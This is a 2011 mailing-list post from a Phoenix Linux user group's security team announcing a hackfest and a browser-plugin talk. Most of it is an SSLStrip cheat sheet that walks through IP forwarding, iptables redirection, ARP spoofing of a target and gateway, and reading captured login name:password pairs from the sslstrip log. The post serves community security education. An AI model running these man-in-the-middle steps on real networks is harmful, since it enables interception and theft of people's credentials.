[Plug-security] HackFest Saturday @ Noon 260 Arizona Avenue in Chandler SEE: Gangplankhq.com

Lisa Kachold lisakachold at obnosis.com
Fri Feb 18 12:50:35 MST 2011


Next PLUG Security Team Saturday Noon - 15:00 Gangplankhq.com
http://plug.phoenix.az.us

*Hayst.ac Firefox Browser PlugIn*

David Huerta will be showcasing hayst.ac - his Firefox Security Plugin; just
one of the many Haystack Project <http://haystackproject.org/>s:

After arriving in Arizona from the posh, cosmopolitan enclave of
southeastern Idaho, David founded the DeVry Linux User Group (DeLUG) in
2003, an originally student organization that drew members and activities
from the greater West Valley Free software community, including students at
GCC and ASU West. He is also the founder of Hayst.ac, a web history
obfuscation system, and serves on the board of directors for HeatSync Labs,
a hackerspace in Chandler.
*Hamaci/LogMeIn HackFests*

Saturday 19th of January, 2011, Hamachi network hackfest:
DO NOT CONNECT TO THIS NETWORK UNLESS YOU ARE CERTAIN OF YOUR SECURITY!
hackfest password = trustme
Hackfest ends on Sunday at 22:00. Have fun!

If you bring your laptop to open hackfest labs and join any fest network
(plan on being able to use live CDs, or USB jump drive) you might want to
disable the hard drive . Using gangplank's open network, Wifi is unlimited
for researching and acceptable use shared community access (no cracking).

Other Work:
Rebuild old Linux system (with radius for enterprise-WPA2) into gPXE for
imaging (Just like we did for Installfest):

Add a puppet cfengine process to maintain our configuration files even after
<s>edited</s> hacked.

Just Like Farengi - We Like to BE PREPARED:

# SSLStrip CHEATSHEET

OVERVIEW:

Requirements

    * Python >= 2.4 (apt-get install python)
    * The python "twisted-web" module (apt-get install twisted-web)

Setup

    * tar zxvf sslstrip-0.5.tar.gz
    * cd sslstrip-0.5
    * (optional) sudo python ./setup.py install

Running sslstrip

    * Flip your machine into forwarding mode. (echo "1" >
/proc/sys/net/ipv4/ip_forward)
    * Setup iptables to redirect HTTP traffic to sslstrip.
(iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT
--to-port <listenPort>)
    * Run sslstrip. (sslstrip.py -l <listenPort>)
    * Run arpspoof to convince a network they should send their traffic to
you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)

Thanks to Moxie MarlinSpike

https://www.blackhat.com/html/bh-dc-09/bh-dc-09-speakers.html#Marlinspike

STEP X STEP (for those who need it slower):

# Proxy Preparation

    * First verify routing and nat;

    # cat /proc/sys/net/ipv4/ip_forward

    * 0

    # echo 1 > /proc/sys/net/ipv4/ip_forward

    # cat /proc/sys/net/ipv4/ip_forward

    * 1

    # /sbin/iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j
REDIRECT --to-port 8080

# Start MITM

    * Arpspoof addresses to default interface gateway (and target machine)

     # arpspoof –i eth0 –t 192.168.1.231 192.168.1.244

# SSL Strip

    * Start SSLStrip:

    # ./sslstrip –l 8080

* Open Browser  -  Go Login to SSL https://Gmail.com (for instance)

# tail –f sslstrip.log

You will log the name:password pairs for each site visited from the proxy.

As you can see, the default gateway and target machine can be seasoned to
taste.

./sslstrip -h

------------------------------------end SHEETCHEAT

 http://www.obnosis.com

*Catch My MetaSploit & IP CAM Surveillance
Presentations @ ABLEConf.com in April!*

















-- 
(503) 754-4452
(623) 688-3392

Next PLUG Security Team Saturday Noon - 15:00 Gangplankhq.com
http://plug.phoenix.az.us


 http://www.obnosis.com
*Catch My MetaSploit & IP CAM Surveillance
Presentations @ ABLEConf.com in April!*
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.PLUG.phoenix.az.us/pipermail/plug-security/attachments/20110218/1a466e44/attachment.html>


More information about the Plug-security mailing list